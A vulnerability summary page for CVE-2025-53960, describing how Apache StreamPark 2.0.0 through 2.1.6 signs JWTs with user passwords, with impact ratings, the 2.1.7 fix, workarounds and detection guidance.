CVE-2025-53960
📋 TL;DR
Apache StreamPark versions 2.0.0 through 2.1.6 use user passwords as JWT signing keys, allowing attackers who capture tokens to brute-force passwords offline or forge tokens if passwords are known. This vulnerability enables complete account takeover for affected users. All deployments using vulnerable versions are at risk.
💻 Affected Systems
- Apache StreamPark
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Complete account takeover for all users, allowing attackers to impersonate any user, access sensitive data, and perform unauthorized actions within the application.
Likely Case
Targeted account compromise where attackers capture JWTs from network traffic or logs, then brute-force weak passwords to gain unauthorized access.
If Mitigated
Limited impact if strong password policies are enforced and JWTs are transmitted securely, though the fundamental design flaw remains exploitable.
🎯 Exploit Status
Exploitation requires capturing a JWT token first, which typically requires some level of access or network interception.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.1.7
Vendor Advisory: https://lists.apache.org/thread/xlpvfzf5l5m5mfyjwrz5h4dssm3c32vy
Restart Required: Yes
Instructions:
1. Download Apache StreamPark 2.1.7 from official sources. 2. Stop the current StreamPark service. 3. Replace with patched version. 4. Restart the service. 5. Verify JWT signing now uses a secure, independent key.
🔧 Temporary Workarounds
Disable JWT Authentication
allTemporarily disable JWT-based authentication and use alternative authentication methods.
Modify application configuration to remove or comment out JWT authentication settings
Implement External JWT Validation
allUse an external API gateway or reverse proxy to validate JWTs with proper key management.
Configure nginx/apache/traefik to validate JWTs before forwarding to StreamPark
🧯 If You Can't Patch
- Enforce strong password policies (minimum 16 characters, complexity requirements) to make brute-force attacks impractical.
- Implement network segmentation and monitoring to detect JWT capture attempts and unauthorized access.
🔍 How to Verify
Check if Vulnerable:
Check if JWT tokens are signed using user passwords by examining token signatures or reviewing application source code for HMAC key generation logic.Check Version:
Check the StreamPark version in the web interface or configuration files, or run: java -jar streampark-web.jar --versionVerify Fix Applied:
After upgrading, verify that JWT signatures are generated using a secure, independent key rather than user passwords.📡 Detection & Monitoring
Log Indicators:
- Multiple failed login attempts followed by successful logins from unusual locations
- JWT tokens being transmitted in URLs or logs
Network Indicators:
- Unusual patterns of JWT token requests or captures in network traffic
SIEM Query:
source="streampark" AND (event_type="authentication" AND result="success") | stats count by user, src_ip | where count > threshold